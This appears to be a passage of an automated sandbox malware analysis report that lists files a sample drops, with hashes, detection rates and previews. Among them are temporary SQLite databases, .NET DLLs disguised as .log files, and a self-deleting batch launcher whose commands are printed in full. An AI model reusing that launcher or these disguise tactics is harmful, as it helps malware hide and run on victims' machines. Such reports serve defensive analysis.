                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                Category:dropped
                                                                                                Size (bytes):196608
                                                                                                Entropy (8bit):1.121297215059106
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\kAkQdyqDby

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\lIqgdRuqBB

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.136413900497188
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\oCffz6mD65

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):25
                                                                                                Entropy (8bit):4.483856189774723
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:0mTqBnIWnW:0JIgW
                                                                                                MD5:FE7877CE141589F960E5FE92F6C8C975
                                                                                                SHA1:23D104B683B2A82AA2320DB7F18CC276C3E4F6E2
                                                                                                SHA-256:F0B083780CA288D35D1EC2736023C6FBF84236496C9D137FE3C903E67881BA76
                                                                                                SHA-512:B464F62B59450F0B9A7B8B1B44AD0DDA314224EF3D209AE963124F3A7841E004DD5647C37D2DFFA6C36FEA32026F136C245BCDB08E5A8FA59DC79F4841722411
                                                                                                Malicious:false
                                                                                                Preview:et70NbJWRLXvskq0GbFmDrEB3

                                                                                                C:\Users\user\AppData\Local\Temp\od2jP3kdg9

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):51200
                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\pNXvVVQa5g

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\wZpseasiVz

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):266
                                                                                                Entropy (8bit):5.357952762053599
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:hCijTg3Nou1SV+DER5IlMx5siWx1il2p0ZKOZG1923frGH:HTg9uYDEfPDWxXarU
                                                                                                MD5:36913E5FAB76F648B300B9CF952DE3E8
                                                                                                SHA1:2C823F6F8F4AB631A6DC919FB21312AE91F2CB88
                                                                                                SHA-256:A0B1FC4AD7BB9557B07CC9956B7A20638C825FFAF16DBDADA3CBDD3E8A02E4C9
                                                                                                SHA-512:1C48FB943A8CE53BF734430066308F630B516E4A40E5FC2703500BC93E1A2BC8D3AE64BF661D5F6944AB592BCDF105B70893FF853F160E8B9046BAEACE0206B4
                                                                                                Malicious:false
                                                                                                Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\zuwFoSPM2u.bat"

                                                                                                C:\Users\user\Desktop\ArFrORkS.log

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):33792
                                                                                                Entropy (8bit):5.541771649974822
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: lv961v43L3.exe, Detection: malicious, Browse
                                                                                                • Filename: RRjzYVukzs.exe, Detection: malicious, Browse
                                                                                                • Filename: FMd6ntIhQY.exe, Detection: malicious, Browse
                                                                                                • Filename: Q9AQFOA6YC.exe, Detection: malicious, Browse
                                                                                                • Filename: fdsN8iw6WG.exe, Detection: malicious, Browse
                                                                                                • Filename: I0xP0G2l1W.exe, Detection: malicious, Browse
                                                                                                • Filename: 5Aw2cV5m0c.exe, Detection: malicious, Browse
                                                                                                • Filename: AvQTFKdsST.exe, Detection: malicious, Browse
                                                                                                • Filename: jD1RqkyUNm.exe, Detection: malicious, Browse
                                                                                                • Filename: BdYcIFnY2J.exe, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\DhiqiJKM.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24064
                                                                                                Entropy (8bit):5.4346552043530165
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                                                                MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                                                                SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                                                                SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                                                                SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 6%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\EhviVOkL.log

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24064
                                                                                                Entropy (8bit):5.492504448438552
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                                                                MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                                                                SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                                                                SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                                                                SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 46%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\FNQYcsFE.log

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):46592
                                                                                                Entropy (8bit):5.870612048031897
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\IUzpLFaA.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):9728
                                                                                                Entropy (8bit):5.0168086460579095
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                                                C:\Users\user\Desktop\KIRpkYvx.log

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):85504
                                                                                                Entropy (8bit):5.8769270258874755
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                C:\Users\user\Desktop\PwjnMVKl.log

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):22016
                                                                                                Entropy (8bit):5.41854385721431
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\QyIevzpi.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):33792
                                                                                                Entropy (8bit):5.541771649974822
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\RGFoMnqm.log

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):23552
                                                                                                Entropy (8bit):5.529329139831718
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\VWRNVcdg.log

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32256
                                                                                                Entropy (8bit):5.631194486392901
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\VoMNpBPa.log

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24064
                                                                                                Entropy (8bit):5.4346552043530165
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                                                                MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                                                                SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                                                                SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                                                                SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 6%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\WyUWCOVc.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):46592
                                                                                                Entropy (8bit):5.870612048031897
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\aceLSxeO.log

                                                                                                Download File
